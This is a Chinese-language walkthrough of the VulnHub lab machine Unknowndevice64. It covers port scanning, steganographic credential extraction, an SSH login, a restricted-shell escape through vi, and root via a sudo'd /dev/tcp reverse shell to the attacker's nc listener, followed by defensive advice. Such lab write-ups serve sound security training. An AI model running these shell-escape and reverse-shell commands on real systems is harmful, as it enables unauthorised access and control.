VulnHub渗透测试Unknowndevice64
字数 871 2025-08-18 11:38:23

VulnHub渗透测试:Unknowndevice64 靶机实战教程

测试环境配置

  • 攻击机:

    • Kali Linux (IP: 172.17.135.75)
  • 靶机:

    • Unknowndevice64 (IP: 172.17.135.64)
  • 网络配置:

    • 确保所有机器在同一网络段
    • 测试前确认网络连通性

初始信息收集

端口扫描

使用Nmap进行全端口扫描:

nmap -T4 -A -sS -p 1-65535 -v 172.17.135.64

扫描结果:

  • 31337/tcp - http服务
  • 1337/tcp - ssh服务

31337端口分析

  1. 访问http://172.17.135.64:31337
  2. 查看页面源代码,发现隐藏目录:key_is_h1dd3n.jpg
  3. 访问该图片:http://172.17.135.64:31337/key_is_h1dd3n.jpg

隐写分析

使用steghide工具提取隐藏信息:

steghide extract -sf key_is_h1dd3n.jpg -p h1dd3n

提取结果:

  • 获得文件h1dd3n.txt,内容为Brainfuck编码

Brainfuck解码

使用在线解码工具解码后获得凭证:

ud64:1M!#64@ud

1337端口SSH登录

使用获取的凭证进行SSH连接:

ssh -p 1337 ud64@172.17.135.64

初始限制:

  • 大多数常用命令被禁用
  • sudo命令不可用
  • vi编辑器可用

受限环境逃逸

  1. 在SSH会话中启动vi编辑器
  2. 在vi命令行模式下执行:
!/bin/bash
  1. 成功获得bash shell

修复环境变量

设置可用的环境变量:

export SHELL="/bin/bash"
export PATH="/usr/bin"

权限提升

反弹Shell提权

  1. 在Kali上设置监听:
nc -lvp 4444
  1. 在靶机上执行反弹shell命令:
sudo sysud64 -uroot /bin/bash -c "/bin/sh -i >& /dev/tcp/172.17.135.75/4444 0>&1"
  1. 成功获得root权限

获取Flag

在root权限下查找并读取flag文件

关键点总结

  1. 信息收集:全端口扫描是发现非常规服务的关键
  2. 隐写分析:网页中隐藏的图片可能包含重要信息
  3. 编码识别:Brainfuck编码需要特殊解码工具
  4. 受限环境逃逸:利用可用的编辑器功能突破限制
  5. 提权技术:反弹shell是受限环境下有效的提权方法
  6. 环境修复:正确设置环境变量可恢复基本功能

防御建议

  1. 避免在图片中存储敏感信息
  2. 限制非常规端口上的服务
  3. 实施严格的命令限制策略
  4. 监控sudo权限的使用
  5. 定期审计系统上的特权命令
VulnHub渗透测试:Unknowndevice64 靶机实战教程 测试环境配置 攻击机 : Kali Linux (IP: 172.17.135.75) 靶机 : Unknowndevice64 (IP: 172.17.135.64) 网络配置 : 确保所有机器在同一网络段 测试前确认网络连通性 初始信息收集 端口扫描 使用Nmap进行全端口扫描: 扫描结果 : 31337/tcp - http服务 1337/tcp - ssh服务 31337端口分析 访问http://172.17.135.64:31337 查看页面源代码,发现隐藏目录: key_is_h1dd3n.jpg 访问该图片:http://172.17.135.64:31337/key_ is_ h1dd3n.jpg 隐写分析 使用steghide工具提取隐藏信息: 提取结果 : 获得文件 h1dd3n.txt ,内容为Brainfuck编码 Brainfuck解码 使用在线解码工具解码后获得凭证: 1337端口SSH登录 使用获取的凭证进行SSH连接: 初始限制 : 大多数常用命令被禁用 sudo命令不可用 vi编辑器可用 受限环境逃逸 在SSH会话中启动vi编辑器 在vi命令行模式下执行: 成功获得bash shell 修复环境变量 设置可用的环境变量: 权限提升 反弹Shell提权 在Kali上设置监听: 在靶机上执行反弹shell命令: 成功获得root权限 获取Flag 在root权限下查找并读取flag文件 关键点总结 信息收集 :全端口扫描是发现非常规服务的关键 隐写分析 :网页中隐藏的图片可能包含重要信息 编码识别 :Brainfuck编码需要特殊解码工具 受限环境逃逸 :利用可用的编辑器功能突破限制 提权技术 :反弹shell是受限环境下有效的提权方法 环境修复 :正确设置环境变量可恢复基本功能 防御建议 避免在图片中存储敏感信息 限制非常规端口上的服务 实施严格的命令限制策略 监控sudo权限的使用 定期审计系统上的特权命令